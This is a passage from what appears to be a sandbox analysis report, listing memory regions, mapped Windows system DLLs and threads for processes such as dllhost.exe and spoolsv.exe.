0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3265 start_va = 0xb0000 end_va = 0x1affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 3266 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3267 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3268 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3269 start_va = 0xff6a0000 end_va = 0xff6a6fff monitored = 0 entry_point = 0xff6a124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 3270 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3271 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3272 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 3273 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 3275 start_va = 0x1b0000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3276 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3277 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3278 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3279 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3280 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3281 start_va = 0x40000 end_va = 0xa6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3282 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3283 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3284 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3285 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3286 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3287 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3288 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3289 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3290 start_va = 0x1b0000 end_va = 0x2affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 3291 start_va = 0x370000 end_va = 0x46ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 3292 start_va = 0x2b0000 end_va = 0x2d8fff monitored = 0 entry_point = 0x2b1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3293 start_va = 0x470000 end_va = 0x5f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 3294 start_va = 0x2b0000 end_va = 0x2d8fff monitored = 0 entry_point = 0x2b1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3295 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3296 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3297 start_va = 0x2b0000 end_va = 0x36ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 3298 start_va = 0x600000 end_va = 0x780fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000600000" filename = "" Region: id = 3299 start_va = 0x790000 end_va = 0x790fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000790000" filename = "" Region: id = 3300 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007a0000" filename = "" Region: id = 3301 start_va = 0x7b0000 end_va = 0x82cfff monitored = 0 entry_point = 0x7bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3302 start_va = 0x7b0000 end_va = 0x82cfff monitored = 0 entry_point = 0x7bcec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3303 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 3304 start_va = 0x7b0000 end_va = 0x7b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 3305 start_va = 0x7feffbe0000 end_va = 0x7feffc78fff monitored = 0 entry_point = 0x7feffbe1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 3306 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3307 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3308 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3309 start_va = 0x7c0000 end_va = 0x7c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007c0000" filename = "" Region: id = 3312 start_va = 0x830000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000830000" filename = "" Region: id = 3313 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3315 start_va = 0xab0000 end_va = 0xbaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ab0000" filename = "" Region: id = 3316 start_va = 0x7fefd1b0000 end_va = 0x7fefd1c7fff monitored = 0 entry_point = 0x7fefd1b3b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 3317 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3318 start_va = 0x7d0000 end_va = 0x814fff monitored = 0 entry_point = 0x7d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3319 start_va = 0x7d0000 end_va = 0x814fff monitored = 0 entry_point = 0x7d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3320 start_va = 0x7d0000 end_va = 0x814fff monitored = 0 entry_point = 0x7d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3321 start_va = 0x7d0000 end_va = 0x814fff monitored = 0 entry_point = 0x7d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3322 start_va = 0x7d0000 end_va = 0x814fff monitored = 0 entry_point = 0x7d1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3323 start_va = 0x7fefceb0000 end_va = 0x7fefcef6fff monitored = 0 entry_point = 0x7fefceb1064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 3324 start_va = 0xbb0000 end_va = 0xe7efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 3325 start_va = 0x7fefd860000 end_va = 0x7fefd873fff monitored = 0 entry_point = 0x7fefd8610e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 3326 start_va = 0xe90000 end_va = 0xf8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000e90000" filename = "" Region: id = 3327 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3328 start_va = 0x990000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 3329 start_va = 0xfb0000 end_va = 0x10affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fb0000" filename = "" Region: id = 3330 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 3331 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 3335 start_va = 0x7fefc3c0000 end_va = 0x7fefc3e3fff monitored = 0 entry_point = 0x7fefc3c1024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 3344 start_va = 0x7fefb160000 end_va = 0x7fefb1fffff monitored = 0 entry_point = 0x7fefb1deb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 3358 start_va = 0x10b0000 end_va = 0x114ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010b0000" filename = "" Region: id = 3359 start_va = 0x1150000 end_va = 0x124ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001150000" filename = "" Region: id = 3366 start_va = 0x7feff8d0000 end_va = 0x7feff940fff monitored = 0 entry_point = 0x7feff8e1e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 3367 start_va = 0x7fefcc70000 end_va = 0x7fefcc8dfff monitored = 0 entry_point = 0x7fefcc713b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 3368 start_va = 0x7fefd8c0000 end_va = 0x7fefd8cefff monitored = 0 entry_point = 0x7fefd8c19b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 3383 start_va = 0x7fefc370000 end_va = 0x7fefc38cfff monitored = 0 entry_point = 0x7fefc371ef4 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 3384 start_va = 0x7fefe280000 end_va = 0x7feff007fff monitored = 0 entry_point = 0x7fefe2fcebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 3399 start_va = 0x7d0000 end_va = 0x7d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007d0000" filename = "" Region: id = 3401 start_va = 0x7fefbe60000 end_va = 0x7fefbe8cfff monitored = 0 entry_point = 0x7fefbe61010 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 3402 start_va = 0x7feff810000 end_va = 0x7feff861fff monitored = 0 entry_point = 0x7feff8110d4 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 3405 start_va = 0x7fefaf00000 end_va = 0x7fefaf11fff monitored = 0 entry_point = 0x7fefaf0101c region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 374 os_tid = 0x268 Thread: id = 375 os_tid = 0x288 Thread: id = 376 os_tid = 0x2c8 Thread: id = 377 os_tid = 0x30c Thread: id = 378 os_tid = 0x334 Thread: id = 379 os_tid = 0x370 Thread: id = 380 os_tid = 0x374 Process: id = "18" image_name = "spoolsv.exe" filename = "c:\\windows\\system32\\spoolsv.exe" page_root = "0x165e2000" os_pid = "0x438" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\System32\\spoolsv.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Spooler" [0xe], "NT AUTHORITY\\Logon Session 00000000:00011c0b" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 3447 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3448 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 3449 start_va = 0xd0000 end_va = 0x10ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 3450 start_va = 0x77970000 end_va = 0x77b18fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3451 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 3452 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3453 start_va = 0xffa60000 end_va = 0xffaebfff monitored = 0 entry_point = 0xffa6f1e0 region_type = mapped_file name = "spoolsv.exe" filename = "\\Windows\\System32\\spoolsv.exe" (normalized: "c:\\windows\\system32\\spoolsv.exe") Region: id = 3454 start_va = 0x7feffc90000 end_va = 0x7feffc90fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 3455 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 3456 start_va = 0x7fffffdb000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 3457 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 3461 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3462 start_va = 0x120000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 3463 start_va = 0x77750000 end_va = 0x7786efff monitored = 0 entry_point = 0x77765340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 3464 start_va = 0x7fefd9d0000 end_va = 0x7fefda3bfff monitored = 0 entry_point = 0x7fefd9d2780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 3465 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3466 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 3467 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 3468 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3469 start_va = 0x7feff500000 end_va = 0x7feff59efff monitored = 0 entry_point = 0x7feff5025a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 3470 start_va = 0x7feff7f0000 end_va = 0x7feff80efff monitored = 0 entry_point = 0x7feff7f60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 3471 start_va = 0x7feff6c0000 end_va = 0x7feff7ecfff monitored = 0 entry_point = 0x7feff70ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 3472 start_va = 0x77870000 end_va = 0x77969fff monitored = 0 entry_point = 0x7788a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 3473 start_va = 0x7feff010000 end_va = 0x7feff076fff monitored = 0 entry_point = 0x7feff01b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 3474 start_va = 0x7feff080000 end_va = 0x7feff08dfff monitored = 0 entry_point = 0x7feff081080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 3475 start_va = 0x7fefdc90000 end_va = 0x7fefdd58fff monitored = 0 entry_point = 0x7fefdd0a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 3476 start_va = 0x7fefc290000 end_va = 0x7fefc2bbfff monitored = 0 entry_point = 0x7fefc2915c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 3477 start_va = 0x7fefdd60000 end_va = 0x7fefdf36fff monitored = 0 entry_point = 0x7fefdd61010 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 3478 start_va = 0x7fefda40000 end_va = 0x7fefda75fff monitored = 0 entry_point = 0x7fefda41474 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 3479 start_va = 0x7feff0c0000 end_va = 0x7feff19afff monitored = 0 entry_point = 0x7feff0e0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 3480 start_va = 0x7feff1a0000 end_va = 0x7feff276fff monitored = 0 entry_point = 0x7feff1a3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 3483 start_va = 0x7fefe070000 end_va = 0x7fefe272fff monitored = 0 entry_point = 0x7fefe093330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 3484 start_va = 0x7fefd970000 end_va = 0x7fefd989fff monitored = 0 entry_point = 0x7fefd971558 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 3485 start_va = 0x7fefcfd0000 end_va = 0x7fefd02afff monitored = 0 entry_point = 0x7fefcfd6940 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 3486 start_va = 0x7feff880000 end_va = 0x7feff8ccfff monitored = 0 entry_point = 0x7feff881070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 3487 start_va = 0x7feff870000 end_va = 0x7feff877fff monitored = 0 entry_point = 0x7feff871504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 3488 start_va = 0x220000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3489 start_va = 0x220000 end_va = 0x31ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 3490 start_va = 0x3f0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 3491 start_va = 0x320000 end_va = 0x348fff monitored = 0 entry_point = 0x321010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3492 start_va = 0x400000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 3493 start_va = 0x320000 end_va = 0x348fff monitored = 0 entry_point = 0x321010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3494 start_va = 0x7feff090000 end_va = 0x7feff0bdfff monitored = 0 entry_point = 0x7feff091010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 3495 start_va = 0x7feff950000 end_va = 0x7feffa58fff monitored = 0 entry_point = 0x7feff951064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 3496 start_va = 0x590000 end_va = 0x710fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 3497 start_va = 0x720000 end_va = 0x1b1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 3498 start_va = 0x20000 end_va = 0x20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "spoolsv.exe.mui" filename = "\\Windows\\System32\\en-US\\spoolsv.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\spoolsv.exe.mui") Region: id = 3499 start_va = 0xc0000 end_va = 0xc0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 3500 start_va = 0x110000 end_va = 0x110fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 3501 start_va = 0x320000 end_va = 0x32cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 3502 start_va = 0x1b20000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b20000" filename = "" Region: id = 3503 start_va = 0x1d00000 end_va = 0x1d3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001d00000" filename = "" Region: id = 3504 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 3550 start_va = 0x350000 end_va = 0x38ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 3551 start_va = 0x3b0000 end_va = 0x3effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 3552 start_va = 0x1b20000 end_va = 0x1b9cfff monitored = 0 entry_point = 0x1b2cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3553 start_va = 0x1c20000 end_va = 0x1c9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001c20000" filename = "" Region: id = 3554 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 3555 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 3556 start_va = 0x1b20000 end_va = 0x1b9cfff monitored = 0 entry_point = 0x1b2cec8 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 3557 start_va = 0x7fefd7b0000 end_va = 0x7fefd7befff monitored = 0 entry_point = 0x7fefd7b1010 region_type = mapped_file name = 